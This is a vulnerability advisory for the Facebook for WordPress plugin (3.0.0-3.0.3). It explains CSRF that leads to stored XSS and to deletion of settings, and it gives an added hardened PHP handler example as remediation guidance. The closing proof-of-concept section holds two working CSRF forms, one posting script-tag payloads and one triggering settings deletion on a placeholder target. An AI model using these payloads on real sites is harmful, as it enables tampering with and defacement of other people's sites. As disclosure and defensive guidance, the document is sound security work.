WordPress Plugin Vulnerabilities

Facebook for WordPress 3.0.0-3.0.3 - CSRF to Stored XSS and Settings Deletion

Description

The wp_ajax_save_fbe_settings and wp_ajax_delete_fbe_settings AJAX actions of the plugin were vulnerable to CSRF because neither handler checked a nonce. In addition, the settings written by the saveFbeSettings function were not sanitized, so script tags could be saved into the settings and rendered later, giving a CSRF-to-stored-XSS chain; the delete action could likewise be triggered by CSRF to wipe the settings.
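The following is an added example of what the two missing controls look like in a hardened handler; it is not the plugin's own code and does not reproduce the vendor's fix. The AJAX action names, the saved field names (pixelId, accessToken, externalBusinessId) and the saveFbeSettings naming come from the advisory above; the option name fbe_settings_example, the nonce action fbe_settings_nonce, the settings screen id and the numeric-only rule for pixelId are assumptions made for this example.

```php
<?php
/**
 * Added illustration of nonce protection plus input sanitization for the
 * save/delete settings AJAX actions named in the advisory. Not the plugin's
 * code. Option name, nonce action and screen id below are assumed.
 */

// Register handlers under the same AJAX action names the advisory cites.
add_action( 'wp_ajax_save_fbe_settings',   'example_save_fbe_settings' );
add_action( 'wp_ajax_delete_fbe_settings', 'example_delete_fbe_settings' );

/**
 * Shared guard: fail closed unless the request carries a valid nonce for this
 * action AND the caller may change site settings. The nonce is what defeats
 * CSRF (a third-party page cannot know it); the capability check stops a
 * low-privilege logged-in user from reaching the handler at all.
 */
function example_fbe_authorize() {
    // check_ajax_referer() ends the request with a 403 when the nonce in
    // $_REQUEST['_ajax_nonce'] is missing or invalid.
    check_ajax_referer( 'fbe_settings_nonce', '_ajax_nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }
}

/**
 * Save handler. Every field is reduced to a single line of plain text before
 * it is stored, so a value such as "<script>alert(0)</script>" loses its tags
 * and cannot become stored XSS when the settings are rendered later.
 */
function example_save_fbe_settings() {
    example_fbe_authorize();

    $settings = array(
        'pixelId'            => '',
        'accessToken'        => '',
        'externalBusinessId' => '',
    );

    foreach ( array_keys( $settings ) as $key ) {
        // WordPress slashes request data; unslash before sanitizing.
        $raw = isset( $_POST[ $key ] ) ? wp_unslash( $_POST[ $key ] ) : '';
        // sanitize_text_field() strips tags, invalid octets and line breaks.
        $settings[ $key ] = sanitize_text_field( $raw );
    }

    // Tighten further where the expected format is known (assumed: a pixel
    // ID is a string of digits). Reject rather than "repair" bad input.
    if ( '' !== $settings['pixelId'] && ! ctype_digit( $settings['pixelId'] ) ) {
        wp_send_json_error( array( 'message' => 'pixelId must be numeric.' ), 400 );
    }

    update_option( 'fbe_settings_example', $settings );
    wp_send_json_success( $settings );
}

/** Delete handler: the same guard protects the destructive action. */
function example_delete_fbe_settings() {
    example_fbe_authorize();
    delete_option( 'fbe_settings_example' );
    wp_send_json_success();
}

/**
 * Admin side: escape on output (defence in depth even if a bad value ever
 * reaches the database) and hand a nonce to the page's own script so that
 * legitimate requests pass check_ajax_referer().
 */
function example_render_fbe_pixel_field() {
    $settings = get_option( 'fbe_settings_example', array() );
    $pixel_id = isset( $settings['pixelId'] ) ? $settings['pixelId'] : '';
    printf( '<input type="text" name="pixelId" value="%s" />', esc_attr( $pixel_id ) );
}

function example_enqueue_fbe_admin_script( $hook_suffix ) {
    // Only on this plugin's settings screen; the screen id is assumed.
    if ( 'settings_page_fbe-settings-example' !== $hook_suffix ) {
        return;
    }
    wp_enqueue_script( 'fbe-settings-example', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'fbe-settings-example', 'fbeSettings', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'fbe_settings_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_fbe_admin_script' );
```

admin-ajax.php dispatches wp_ajax_* hooks for both GET and POST requests, so restricting the request method alone would not have closed the hole; the nonce check is the control that matters, and the capability check and sanitization remove the remaining impact. When reviewing a plugin for this class of bug, look for every add_action( 'wp_ajax_...' ) callback and confirm it calls check_ajax_referer() (or verifies a nonce some other way) and a current_user_can() check before touching options.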

Proof of Concept

CSRF to XSS
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="save_fbe_settings" />
      <input type="hidden" name="pixelId" value="<script>alert(0)</script>" />
      <input type="hidden" name="accessToken" value="<script>alert(0)</script>" />
      <input type="hidden" name="externalBusinessId" value="<script>alert(0)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF to Delete settings
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="delete_fbe_settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Verified
Yes

Timeline

Publicly Published
2021-03-25
Added
2021-03-25
Last Updated
2021-03-27